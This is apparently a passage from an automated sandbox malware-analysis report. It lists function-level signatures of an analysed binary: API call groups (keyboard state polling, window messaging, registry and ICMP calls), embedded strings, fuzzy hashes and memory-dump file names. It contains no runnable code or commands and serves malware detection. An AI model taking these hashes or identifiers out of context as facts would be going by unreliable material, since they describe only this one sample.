                                                                        • Opcode Fuzzy Hash: 59800c54c1d345ecb424e2fcfa2246da67464ce5bbb623b99681ad9037b4dde3
                                                                        • Instruction Fuzzy Hash: 13617531B18A9296EB04DB68E4416FD6361FF49748F901032EB4D976BADF7CE506CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Messagewprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                        • API String ID: 4051287042-2268648507
                                                                        • Opcode ID: 68b2247ec9c07577535dadd4f69f0712e57ab61aa0c6408de1f9cb681492f952
                                                                        • Instruction ID: 520367dc45a8fe7c954b499e607ec18b3401a7bd48136364d88da0a41fbdb377
                                                                        • Opcode Fuzzy Hash: 68b2247ec9c07577535dadd4f69f0712e57ab61aa0c6408de1f9cb681492f952
                                                                        • Instruction Fuzzy Hash: AD518921B18A5792EB00EB68E8414FD6361FF99798F901032EB4D976BADF7CD506C740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                        • String ID: BUTTON
                                                                        • API String ID: 3935177441-3405671355
                                                                        • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                        • Instruction ID: ab6451e8d8281e793bc8a37c16c4111757f8cc097eeaf458a83cfc02d43482f0
                                                                        • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                        • Instruction Fuzzy Hash: CC314824E09A8782FB149B2DF9947792361BF8D748F494031DB4EC66B2CE3DF4868B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 1974058525-0
                                                                        • Opcode ID: 2ae74a82a6f06563e6c2c5c4916ebfa7778eee006cac500ece4c4ab262848a47
                                                                        • Instruction ID: ea46c6ef5faa6ab028702f0612ecce90390c3b41c967daf92816c06d347c4f19
                                                                        • Opcode Fuzzy Hash: 2ae74a82a6f06563e6c2c5c4916ebfa7778eee006cac500ece4c4ab262848a47
                                                                        • Instruction Fuzzy Hash: 49912635A09A1286EB68DF29E99167933A4FF8DB88F584131CB4EC76B4CF3CE4518340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: c617befc0bd1dbd4d54129b7722c2ebd01a7f232fb97f78571421a33ec3567e4
                                                                        • Instruction ID: 8a5a635de53ac9501002f2206a85001e14209fef17a986631a4cd0491937eea2
                                                                        • Opcode Fuzzy Hash: c617befc0bd1dbd4d54129b7722c2ebd01a7f232fb97f78571421a33ec3567e4
                                                                        • Instruction Fuzzy Hash: EA716122A4C2C295FB358B28D4502B92B61FF49B8CF980079D7CD476A3CF5DD9468761
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                        • Instruction ID: 39548f2a44047bad96144baa5f0c971a9410683d599b236c977263991992d53d
                                                                        • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                        • Instruction Fuzzy Hash: FC615E72B146418BE718CF6AE44466D77A6F788B88F548139DE49D3F68DF3CE9058B00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                        • String ID: %s%u
                                                                        • API String ID: 1412819556-679674701
                                                                        • Opcode ID: 471b516b84a7647fd4691574628735fa1d53b92c229bd2799b629a7d46638598
                                                                        • Instruction ID: 420e452c5b5eac44c6281d846968746f0ae561d2cf4d69d0ef376acc71667379
                                                                        • Opcode Fuzzy Hash: 471b516b84a7647fd4691574628735fa1d53b92c229bd2799b629a7d46638598
                                                                        • Instruction Fuzzy Hash: 1DB1B272B086829AEB19CF29D8486F96764FB49B88F400031DF5D877A6DF3DE556CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                        • String ID: ThumbnailClass
                                                                        • API String ID: 4010642439-1241985126
                                                                        • Opcode ID: 4089a0f050729c67d7336b45243c4151a1a91afee2041f579baef993fdf79b1a
                                                                        • Instruction ID: 9adbde52b72f4b4dc0e543220b33f77fb2bba56ba1288e980cce1dbbff4f26f0
                                                                        • Opcode Fuzzy Hash: 4089a0f050729c67d7336b45243c4151a1a91afee2041f579baef993fdf79b1a
                                                                        • Instruction Fuzzy Hash: 38A19722B0868257EA289F19D4447B96761FF8978CF544035CBCE83AA6DE3DF956CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                        • String ID: P
                                                                        • API String ID: 1268354404-3110715001
                                                                        • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                        • Instruction ID: 4519faf11bec319807042c59e5a5bee3983570c2a2652c1142388f182d667d47
                                                                        • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                        • Instruction Fuzzy Hash: C7615D36A09A428AEB54DF29E8406792791FB8EBDCF144535EF0E877A8DF3CE4518740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: LoadStringwprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 3297454147-2391861430
                                                                        • Opcode ID: 4bdd4d368305ed2511e7c9b5f66333011c7442f4138e402f4b5ca8b6273d0e40
                                                                        • Instruction ID: c74f621e26dff8a7ad71050ac1a74c0501f44ee55d49b34e1ca021055b8f8dee
                                                                        • Opcode Fuzzy Hash: 4bdd4d368305ed2511e7c9b5f66333011c7442f4138e402f4b5ca8b6273d0e40
                                                                        • Instruction Fuzzy Hash: 32719622B28A9296EB04DB69E4415FD6360FF49788F901032EB5D876B9DF7CE506CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 3030280669-22481851
                                                                        • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                        • Instruction ID: a9441212d2a8c770d9586d3505173308386fb7298853efc7c09f959757141626
                                                                        • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                        • Instruction Fuzzy Hash: EF517322618A8295EB50DF69E8906EE67A0FB98798F404031EB4D87AB9DF7CD585C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                        • String ID: static
                                                                        • API String ID: 3821898125-2160076837
                                                                        • Opcode ID: 07e3f444be573a5f56ad52c65b5350ec7a57582bf5bde69e8b4e79c46b6fcd17
                                                                        • Instruction ID: 42f7b20fd76e61a1f50fa8cb151bebca6d1ba00a67172a85baabf9f0e80e3128
                                                                        • Opcode Fuzzy Hash: 07e3f444be573a5f56ad52c65b5350ec7a57582bf5bde69e8b4e79c46b6fcd17
                                                                        • Instruction Fuzzy Hash: 50413C36618B818BEB608F29F444B5AB3A1FB89795F504235DB9D87BA8CF3CD445CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 3827137101-3457252023
                                                                        • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                        • Instruction ID: 5e6b3fe78f1cee33c8e28f1ef7b7423c6cdc3cc12a2aff595c04d10ef6b58feb
                                                                        • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                        • Instruction Fuzzy Hash: 53417F22A1868385E7609F29E8046FD63A0FF8979CF540135DB5D97AB8DF7CD64ACB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                        • Instruction ID: c6a0fcaa7ac81348d97c36a14b62c11e1777a7095883796ab16ab379e9d703e5
                                                                        • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                        • Instruction Fuzzy Hash: CF418122E0C6C295FB759B68A4403792A90FF19B48F884039D7DE836E3CF5DB8958371
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                        • String ID: 5$Ping
                                                                        • API String ID: 1486594354-1972892582
                                                                        • Opcode ID: b1bea8177ce3a97a632dbf446817c1dc0ff42a2f6e09bfff3974867907179b2a
                                                                        • Instruction ID: 8f4f96f2d90dd131a9842f709fa23b1cf2373cc59575568ac63f86bd37e36cd8
                                                                        • Opcode Fuzzy Hash: b1bea8177ce3a97a632dbf446817c1dc0ff42a2f6e09bfff3974867907179b2a
                                                                        • Instruction Fuzzy Hash: D4715C62A08A4286EB20DB2AD49437D7BA0FF89B98F058431DB5EC77B5CF7CD5468740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                        • API String ID: 3215553584-2617248754
                                                                        • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                        • Instruction ID: ddc2508198a9801837ad0aaf70605483e5fed035b8e95fe0b25dbaeda9863485
                                                                        • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                        • Instruction Fuzzy Hash: AD416972A0AB45C9FB54CF29E8517AE33A4FB19398F404536EB5C87BA9DE38D025C344
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadMessageModuleStringwprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                        • API String ID: 4007322891-4153970271
                                                                        • Opcode ID: d2c53d1d959ddbb042106dfbd728545592dc85493fc1c840e99c250cd80bea81
                                                                        • Instruction ID: f339ab487095a57bbd170f6bde20a9abbfd2c0e3dc4f25632c3cc55bc289e76e
                                                                        • Opcode Fuzzy Hash: d2c53d1d959ddbb042106dfbd728545592dc85493fc1c840e99c250cd80bea81
                                                                        • Instruction Fuzzy Hash: 7D314232A18A8692EB10DB19E8455FD6360FF58B88F944032EB4D877B9DF7CD506CB50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$ClassName
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 2573188126-1403004172
                                                                        • Opcode ID: a8d2e2293dbfee37da9a2fe869a5b922080c116a80800c43aba43d92898523f5
                                                                        • Instruction ID: 665ad718868bce4fd58548ef58f09f40f7db35ff2a378a727baa6ea4cae2dd7b
                                                                        • Opcode Fuzzy Hash: a8d2e2293dbfee37da9a2fe869a5b922080c116a80800c43aba43d92898523f5
                                                                        • Instruction Fuzzy Hash: C2317136A08A81C2FA14DB19E8541B86361FF8DBE8F444231DFAD877E6CE2CD509C750
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 2479661705-3771769585
                                                                        • Opcode ID: 5bd4a66129f85cfbef26a4d83ab52e864799b409ed7e15ef3bdc7b769243edec
                                                                        • Instruction ID: f873eab5bd12863e3afe449d585a8df9f531dcdca4659d4bda03996fd5f52eb8
                                                                        • Opcode Fuzzy Hash: 5bd4a66129f85cfbef26a4d83ab52e864799b409ed7e15ef3bdc7b769243edec
                                                                        • Instruction Fuzzy Hash: E9214121A0898281EA24AB19E5543BD6361FF9CBDCF444135DB8EC76B6DE6CE545C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
